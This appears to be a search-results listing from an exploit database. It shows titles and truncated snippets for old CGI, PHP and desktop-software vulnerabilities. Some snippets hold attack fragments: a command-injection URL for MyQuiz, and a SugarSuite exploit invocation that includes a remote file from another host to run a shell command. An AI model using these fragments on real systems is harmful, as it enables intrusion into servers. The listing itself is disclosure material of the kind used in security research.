1697 matches found
HelpDesk.cgi Vulnerability
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!! -------------------------------------------------------------------------------- Title : HelpDesk.cgi Vulnerability -------------------------------------------------------------------------------- Author: CrackersChild cont@ct:...
Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Local Buffer Overflows
/ by Luigi Auriemma / include include include include define VER "0.1" define POCNAME "proof-of-concept" void fwbofFILE fd, int len, int chr; void fwi08FILE fd, int num; void fwi16FILE fd, int num; void fwi32FILE fd, int num; void fwstxFILE fd, uint8t str, int size; void fwmemFILE fd, uint8t data...
Mambo User Home Pages Component <= 0.5 Remote Include Vulnerability
No description provided by source. Kurdish Security Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : User Home Pges Site : www.ravensportal.co.uk Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca a...
CVE-2006-3325
client/clparse.c in the id3 Quake 3 Engine 1.32c and the Icculus Quake 3 Engine ioquake3 revision 810 and earlier allows remote malicious servers to overwrite arbitrary write-protected cvars variables on the client, such as clallowdownload for Automatic Downloading and fshomepath for the quake3...
Prodder 0.4 - Arbitrary Shell Command Execution
source: https://www.securityfocus.com/bid/18068/info Prodder is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary shell commands on the vulnerab...
phpMyDirectory 10.4.4 - ROOT_PATH Remote File Inclusion
phpMyDirectory 10.4.4 - ROOTPATH Remote File Inclusion Title : phpMyDirectory = 10.4.4 Remote File Inclusion Vulnerability - URL : http://www.phpmydirectory.com/ - Dork : "powered by phpmydirectory" or intext:"2001-2006 phpMyDirectory.com" - Author : OLiBekaS - contact : olibekasatgmail.com -...
LifeType 1.0.3 - index.php Cross-Site Scripting
LifeType 1.0.3 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/17529/info LifeType is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in t...
CVE-2006-1061
Heap-based buffer overflow in cURL and libcURL 7.15.0 through 7.15.2 allows remote attackers to execute arbitrary commands via a TFTP URL tftp:// with a valid hostname and a long path...
QNX Neutrino 6.2.1 - 'phfont' Race Condition Privilege Escalation
!/bin/sh word, exploit for http://www.idefense.com/intelligence/vulnerabilities/display.php?id=383 greetings and salutations from www.lort.dk kokanin@dtors 18/10/2003 $ cksum /usr/photon/bin/phfont 4123428723 30896 /usr/photon/bin/phfont $ uname -a QNX localhost 6.2.1 2003/01/08-14:50:46est x86pc...
MyQuiz 1.01 - 'PATH_INFO' Arbitrary Command Execution
!/usr/bin/perl = MyQuiz Remote Command Execution Exploit - By Hessam-x / www.hackerz.ir manual exploiting -- http://target/cgi-bin/myquiz.pl/ask/;| SecurityFocus bug : http://www.securityfocus.com/archive/1/423921/30/0/threaded / | \ | | / \ \ / | |/ // \ \ / \ Y // \ | | \ | / \ / / / / /...
Dev Web Management System <= 1.5 (cat) Remote SQL Injection Exploit
No description provided by source. ?php ---Dev15sqlxpl.php 9.54 24/12/2005 Dev =1.5 'cat' SQL injection / admin MD5 password hash disclosure coded by rgod site: http://rgod.altervista.org - this works regardless of magicquotesgpc setting usage: launch from Apache, fill in requested fields, then g...
SugarSuite Open Source <= 4.0beta Remote Code Execution Exploit (c)
Exploit for unknown platform in category web applications =================================================================== SugarSuite Open Source "; fclose$fp; ? ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt ls%20-al HTTP/1.1 200 OK Date: Thu, 08 Dec 2005 12:35:33 GMT Server:...
Glider collectn kill 1.0.0.0 - Buffer Overflow (PoC)
Glider collectn kill 1.0.0.0 - Buffer Overflow PoC / by Luigi Auriemma / include include include include ifdef WIN32 include / Header file used for manage errors in Windows It support socket and errno too this header replace the previous sockerrX.h / include include void stderrvoid char error;...
In W2K, elevated several attack instances of success or failure experiences-vulnerability and early warning-the black bar safety net
Speaking of the Virus are related to elevation of Privilege issues, the so-called elevation of privilege is the use of the system loopholes to obtain higher Privilege to. For example, you use the General user account to log on to Windows NT/Windows 2 0 0 0, You can only make a limited operation,...
FTP Writable Directories
By crawling through the remote FTP server, Nessus discovered several directories were marked as being world-writable. This could have several negative impacts : - Temporary file uploads are sometimes immediately available to all anonymous users, allowing the FTP server to be used as a 'drop' poin...
FTP Internet Access Manager <= 1.2 Command Execution Exploit
No description provided by source. !usr/bin/perl FTP Internet Access Manager Command Exploit ---------------------------------------------- Infam0us Gr0up - Securiti Research Info: infamous.2hell.com Vendor URL: www.softfolder.com/internetaccessmanager.html use IO::Socket; if @ARGV != 4 print "\n...
Looking Glass v20040427 arbitrary commands execution / cross site scripting
9.05 27/08/2005 Looking Glass v20040427 arbitrary commands execution / cross site scripting description: Looking Glass is a pretty extensive web based network querying tool for use on php enabled servers. site: http://de-neef.net/articles.php?id=2&page=1 download page:...
FW: Updated Version & Exploit - Privilege escalation in Nortel Contivity VPN Client V05_01.030
Updated to add additional version & exploit details. Reps to Crime Dog Vulnerable Versions: Nortel Contivity VPN Client V0501.100 Patches/Workarounds: Good question Exploit: 1. With the Contivity client open click go into "Group Authentication Options" 2. Select "Challenge Response Token" options...
Calendar Express 2.2 - 'search.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/14505/info Calendar Express is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the...
@Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/14408/info @Mail is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code executed in the...